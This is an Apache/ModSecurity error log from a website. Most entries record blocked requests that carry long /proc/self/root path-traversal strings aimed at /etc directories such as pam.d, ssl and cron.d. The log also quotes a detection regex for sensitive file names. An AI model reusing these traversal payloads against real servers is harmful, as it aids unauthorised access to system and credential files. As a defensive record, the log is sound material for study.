[Fri Mar 20 03:08:24.822569 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.243.128:40722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkWPXLqtnMIWvjpaJiqAAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:27.294230 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.241.31:37534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkWwF0L0L-SsrnPo4yGwAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:08:29.559485 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.241.31:52806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkXQF0L0L-SsrnPo4yHQAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:31.843556 2026] [:error] [pid 30424:tid 140411708356352] [client 74.7.241.31:52812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkX8t36Dv4L1GW-s-h3gAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:08:32.337510 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:40730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkYNa6ubjKNq_cu4aYuAAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:35.312713 2026] [core:alert] [pid 7893:tid 140411599251200] [client 74.7.243.128:35040] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:35.810167 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:35050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkY9a6ubjKNq_cu4aYvAAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:36.387012 2026] [:error] [pid 31215:tid 140411590858496] [client 74.7.241.31:52824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkZAF0L0L-SsrnPo4yIQAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:08:37.595957 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:35064] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkZfu8EFLIOrSqIpvo2AAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:38.131614 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.241.31:58368] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkZvu8EFLIOrSqIpvo2QAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:08:40.279188 2026] [:error] [pid 8307:tid 140411632822016] [client 74.7.243.128:42464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkaL-FhjpZGs9ba8quzQAAAw0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:41.017017 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.241.31:58384] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkaRCii7xarUs8iHYuFAAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:08:42.487208 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:42480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkauoXxyEfFpUF8f9OFQAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:44.061360 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.241.31:58392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkbAkwaGbbGflqUZAOnwAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:45.506298 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.243.128:42482] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkbRCii7xarUs8iHYuKgAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:47.125983 2026] [proxy_fcgi:error] [pid 31215:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45644] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:08:48.285797 2026] [mime_magic:error] [pid 15826:tid 140411582465792] (70014)End of file found: [client 57.141.18.93:52134] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:08:49.163814 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:42486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkceoXxyEfFpUF8f9OGAAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:50.169364 2026] [proxy_fcgi:error] [pid 8307:tid 140411582465792] [client 108.179.219.145:54670] AH01071: Got error 'Primary script unknown'
[Fri Mar 20 03:08:51.978964 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.243.128:35406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkc_XLqtnMIWvjpaJiugAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:56.706974 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:35406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkePXLqtnMIWvjpaJi0wAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:58.271093 2026] [:error] [pid 8307:tid 140411624429312] [client 74.7.243.128:35414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzker-FhjpZGs9ba8qu6QAAAw4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:59.933448 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.243.128:54400] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkewF0L0L-SsrnPo4yMwAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:01.435624 2026] [:error] [pid 30424:tid 140411540502272] [client 74.7.243.128:54416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkfct36Dv4L1GW-s-h-QAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:03.478332 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:54428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkf_u8EFLIOrSqIpvo6wAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
